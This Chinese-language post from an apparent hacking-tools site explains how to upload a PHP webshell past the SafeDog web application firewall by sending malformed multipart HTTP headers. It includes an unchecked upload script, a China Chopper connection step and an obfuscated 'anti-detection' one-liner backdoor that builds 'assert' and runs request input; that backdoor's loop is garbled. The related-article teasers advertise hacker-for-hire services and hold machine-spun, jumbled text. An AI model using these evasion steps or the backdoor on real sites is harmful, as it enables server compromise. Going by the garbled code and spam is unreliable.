绕过网站安全狗阻拦,上传Webshell技巧总结(附免杀PHP一句话)

访客6年前黑客工具566

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的办法。
思路是:修正HTTP恳求,构成变形HTTP恳求,然后绕过网站安全狗的检测。
废话不多说,切入正题。。。。
1、试验环境:
Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048
2、用于文件上传的PHP源码:
 $path = dirname(__FILE__) . '/upload/';
 $rand = rand(0,30);
 move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);
 echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "";
 echo "OK";
?>
由于此次试验的意图是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。
3、先看一下正常的HTTP恳求:

 
很明显,文件名为”yijuhua.php”被阻拦。。。。
4、测验%00切断:

 
很明显,失利了。。。
5、修正HTTP恳求,结构变形HTTP恳求
(1)删去实体里边的Conten-Type字段:


绕过网站安全狗的阻拦,成功上传WebShell。。。
(2)删去Content-Disposition字段里的空格:

 


 
(3)修正Content-Disposition字段值的大小写:

 
6、菜刀衔接一句话:

 
到此,上传WebShell完毕,各位看理解了吗?
7、免杀PHP一句话:
 /*
 PHP一句话木马
 assert($string)
 */
 $arr = array('a','s','s','e','r','t');
 $func = '';
 for($i=0;$i
 $func .= $func . $arr[$i];
 }
 $func($_REQUEST['c']);
?>

 
8、修正缝隙:
呈现这种状况,我认为是网站安全狗在开发时没有考虑到变形HTTP恳求,而Apache却兼容变形HTTP恳求,所以可以上传成功。
 

相关文章

借不了赌怎么办、总输钱、然后还幻想能赢回来

关于成功率的说法通过这种攻击使得攻击者在仅有一个普通域账号的情况下可以远程控制 Windows 域内的任何机器,包括域控服务器。 Windows XP 专业 x64 版 SP2借不了赌怎么办、总输钱...

黑客接单多少钱_南京工业大学可以找黑客改成绩吗-小锅盖找黑客更新

「黑客接单多少钱_南京工业大学可以找黑客改成绩吗-小锅盖找黑客更新」1[1][2][3][4][5][6][7]黑客接单渠道浸透进程便是各种安全技能的再现进程,本次浸透从SQL注入点的发现到绕过sql...

黑客网赌接单,福州被黑客攻击找什么部门,网络黑客哪里找

"com.sun.jndi.rmi.registry.RegistryContextFactory");这其实是一场信号争夺战,那么有没有办法让无人机更安稳的更安稳接纳咱们的信号呢?假如咱们把跳频时刻...

ewebeditor漏洞原理和总结

首先介绍编辑器的一些默认特征: 默认登陆admin_login.asp 默认数据库db/ewebeditor.mdb 文件名称及路径: Admin_Login...

用微信,网赌钱被黑找黑客,找黑客解冻淘宝账号

大局审计到存在SQL注入的当地,变量没有过滤(双引号,addslash) env.put(Context.PROVIDER_URL,用户名:LinhaiWeb Drive-by(垂钓进犯...

黑客接单 诚信黑客2017_损友圈在哪找黑客

三、Managed Defense快速反应:查询进犯者这种传达方法的呈现,导致2018年11月GandCrab勒索病毒忽然成规划的迸发,令许多用户遭受进犯。 下面是举例阐明的电话脚本黑客接单 诚信黑客...